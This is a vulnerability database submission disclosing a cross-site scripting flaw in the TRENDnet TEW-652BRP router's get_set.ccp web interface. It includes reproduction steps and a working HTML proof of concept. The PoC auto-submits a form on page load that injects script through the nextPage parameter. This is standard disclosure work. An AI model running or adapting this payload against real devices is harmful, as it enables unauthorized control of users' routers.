Submit #78681: An XSS on TRENDnet router TEW-652BRPinfo

Titel	An XSS on TRENDnet router TEW-652BRP
Beschreibung	# XSS on TRENDnet router TEW-652BRP ## Overview * Type: XSS * Supplier: TRENDNet (https://www.trendnet.com/) * Product: TRENDNet TEW-652BRP (Version v3.2R, https://www.trendnet.com/support/support-detail.asp?prod=235_TEW-652BRP) * Firmware download: https://downloads.trendnet.com/tew-652brp_v3.2/firmware/fw_tew-652brp_v3(3.04b01).zip * Affect version: latest version 3.04B01 * Bug URL: http://192.168.10.1/get_set.ccp ## Description An XSS vulnerability exits at a parameter of post request which is triggered after logging in to the web. The device uses a plaintext password to log in web, so it's easy to leak passwords from the HTTP flow. This vulnerability can be exploited easily. ## Reproduce and PoC ### Steps to Reproduce I have put the PoC(HTML code) in the next section. You need to configure the device's web IP address in the URL. Log in to the web management interface in the browser, then open the PoC on a new page, and an alert will pop up. Note: The alert window flashes before going to the next page, so I suggest using burpsuite proxy to slow down the speed. You can also check the response to locate XSS injection. ### Proof of Concept Below is PoC(HTML code), save the code into a file(xss.html). Open it in the browser after logging in to the web target. ``` <!DOCTYPE html> <html> <head> <script> window.onload = function() { document.getElementById("postsubmit").click(); } </script> <meta charset="utf-8"> <title></title> </head> <body> <form method="post" action="http://192.168.10.1/get_set.ccp"> <input id="ccp_act" type="text" name="ccp_act" value="set"/> <input id="ccpSubEvent" type="text" name="ccpSubEvent" value="CCP_SUB_URLFILTER"/> <input id="nextPage" type="text" name="nextPage" value="domain_filter.htm');alert('XSS');//"/> <input id="urlFilterList_ManagedURL_1.1.2.0.0" type="text" name="urlFilterList_ManagedURL_1.1.2.0.0" value="dummy.org"/> <input id="postsubmit" type="submit" value="submit" /> </form> </body> </html> ```
Benutzer	leetsun (UID 39457)
Einreichung	27.01.2023 14:06 (vor 3 Jahren)
Moderieren	02.02.2023 09:10 (6 days later)
Status	Akzeptiert
VulDB Eintrag	220019 [TRENDnet TEW-652BRP 3.04b01 Web Management Interface get_set.ccp nextPage Cross Site Scripting]
Punkte	17

◂ Zurück Übersicht Weiter ▸

Might our Artificial Intelligence support you?

Check our Alexa App!